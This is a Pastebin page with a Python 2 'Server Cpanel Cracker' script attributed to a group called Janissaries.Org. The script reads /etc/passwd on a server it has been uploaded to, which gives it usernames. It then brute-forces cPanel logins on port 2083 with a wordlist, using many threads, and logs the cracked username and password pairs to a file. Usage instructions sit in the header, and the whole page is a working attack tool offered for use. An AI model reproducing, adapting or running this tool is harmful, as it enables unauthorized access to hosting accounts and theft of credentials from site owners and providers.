Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################################
- # .__ .__
- # _____ |__|___.__._____ ____ | |__ __ __ ____ ____
- # / \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
- #| Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
- #|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
- # \/ \/ \/ \/ \/ \//_____/
- # Server Cpanel Cracker [Threading Supported]
- # Privfuckingeight
- # Written by Zepek
- # Janissaries.Org Represents
- # Cracked cpanels will be logging in 'cpanels.txt'
- # Usage: Upload this tool to server then use command execute type
- # python cpcracker.py <WORDLISTFILE> <THREAD>
- # Example: python cpcracker.py wordlist.txt 10
- #######################################################################
- import threading
- import urllib
- import urllib2
- import re
- import socket
- import sys
- import time
- # This is threading function'
- def check_cp(ip):
- try:
- conn = urllib2.urlopen("https://"+ip+":2083/").read()
- print conn
- except urllib2.HTTPError,x:
- x = str(x)
- if re.search("HTTP Error 401",x):
- return True
- else:
- print "[-]Error found while opening ip adress"
- print "https://"+ip+":2083/"
- print str(x)
- return False
- except Exception,a:
- print "[-]Error found while opening ip adress"
- print "https://"+ip+":2083/"
- print str(a)
- return False
- # This is threaded brute-forcer function'
- def bruter(ip,semap,user,pwd):
- try:
- postf = urllib.urlencode({"user":user,"pass":pwd})
- request = urllib2.Request("https://"+ip+":2083/login/?login_only=1",postf)
- connect = urllib2.urlopen(request)
- print "##############################################"
- print "[+]Username: ("+user+")"
- print "[+]Password: ("+pwd+")"
- print "##############################################"
- sys.stdout.flush()
- save = open('cpanels.txt','ab')
- save.write("https://"+user+":"+pwd+"@"+ip+":2083\r\n")
- save.close()
- semap.release()
- except urllib2.HTTPError,e:
- if re.search("401",str(e)):
- print "completed user ("+user+") password ("+pwd+")"
- sys.stdout.flush()
- else:
- print "unknown error excepted!!!"
- print str(e)
- sys.exit(1)
- semap.release()
- # Try to read /etc/passwd
- try:
- filename = sys.argv[1]
- wordlist = open(filename).readlines()
- thread = int(sys.argv[2])
- serverip = socket.gethostbyname(socket.gethostname())
- passwd = open('/etc/passwd').readlines()
- print "written by miyachung";
- print "janissaries.org represents";
- print "--------------------------------------------";
- print "/etc/passwd readed";
- print "found "+str(len(passwd))+" usernames from /etc/passwd"
- print "loaded "+str(len(wordlist))+" passwords from "+filename
- print "threading mode is enabled task limit "+str(thread)
- print "servers ip adress "+serverip
- print "checking for if cpanel is not installed on this server"
- sys.stdout.flush()
- check = check_cp(serverip)
- if check is False:
- print "Oops! cpanel is not installed on this server or python can't handle https request try this tool on another server"
- sys.exit(1)
- else:
- print "Okay! cpanel is installed"
- print "brute force is starting"
- sys.stdout.flush()
- time.sleep(3)
- semap = threading.BoundedSemaphore(value=thread)
- for word in wordlist:
- word = word.strip()
- tasks= []
- for user in passwd:
- semap.acquire()
- user = user.strip()
- user = user.split(':')
- th = threading.Thread(target=bruter,args=(serverip,semap,user[0],word,))
- tasks.append(th)
- th.start()
- for t in tasks:
- t.join()
- sys.exit(1)
- except KeyboardInterrupt:
- sys.exit(1)
- except Exception,e:
- print "[-]Error found! tool completed to work."
- print str(e)
- sys.exit(1)
- ☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
- ☠☠ @contact skype : live:zepek_al ☠☠
- ☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement